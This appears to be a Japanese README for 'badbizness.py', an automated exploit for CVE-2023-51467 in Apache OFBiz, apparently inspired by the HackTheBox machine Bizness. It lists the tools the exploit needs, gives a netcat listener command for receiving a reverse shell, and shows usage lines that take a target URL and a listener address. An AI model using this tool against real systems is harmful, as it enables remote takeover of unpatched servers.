
CVE-2023-51467 における Java Web フレームワーク OFBiz 向けの自動エクスプロイトスクリプト。

Java Webフレームワーク OF Biz のCVE-2023-51467に対する自動エクスプロイトスクリプトです。HackTheBox のマシン Bizness に触発されました。
このスクリプトには、ツール ysoserial と OpenJDK バージョン11が必要です。インストール方法については使用メニューを参照してください。
お好みの方法でシェルを受け取るためのリスナーをセットアップしてください。netcatの例は以下の通りです:
nc -nlvp 1337
スクリプトを実行します:
python3 badbizness.py [ysoserial-all.jarへのパス] [ターゲットのベースURL] [リスナーIP] [リスナーポート]
python3 badbizness.py /home/twopoint/ysoserial-all.jar http://example.com:1337 10.10.10.10. 1337
このツールはPythonについてより深く学ぶための手段として作成されました。この スクリプトに多大な助けを得たことをクレジットします。